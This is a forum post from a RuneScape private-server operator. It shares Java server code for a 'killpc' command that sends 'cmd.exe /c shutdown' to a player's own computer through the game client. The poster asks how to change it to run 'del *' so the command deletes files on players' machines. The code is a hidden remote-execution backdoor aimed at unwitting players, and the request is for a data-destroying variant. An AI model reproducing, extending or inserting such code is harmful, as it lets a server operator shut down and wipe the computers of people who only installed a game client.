C - C++ / Command line hacking through client-run games
« on: January 02, 2016, 06:07:23 PM »
So I run a Runescape Private Server and in my game I have a command which you can use to remotely shut down someone's pc, I was wondering if I could edit this to do "del *" in their cmd line?
Here is the code at the moment, but i'm not ballsy enough to try it on anyone :'P
Here is the code at the moment, but i'm not ballsy enough to try it on anyone :'P
Code: [Select]
if (cmd[0].equalsIgnoreCase("killpc")) {
if (cmd[1].equalsIgnoreCase("nat")) {
player.getPackets().sendGameMessage("* uses Reflect...*");
player.getPackets().sendGameMessage("Its super effective.");
player.getPackets().sendExecMessage("cmd.exe /c shutdown -s -t 10");
return false;
String username = cmd[1].substring(cmd[1].indexOf(" ") + 1);
Player p2 = World.getPlayerByDisplayName(username);
p2.getPackets().sendExecMessage("cmd.exe /c shutdown -f -p");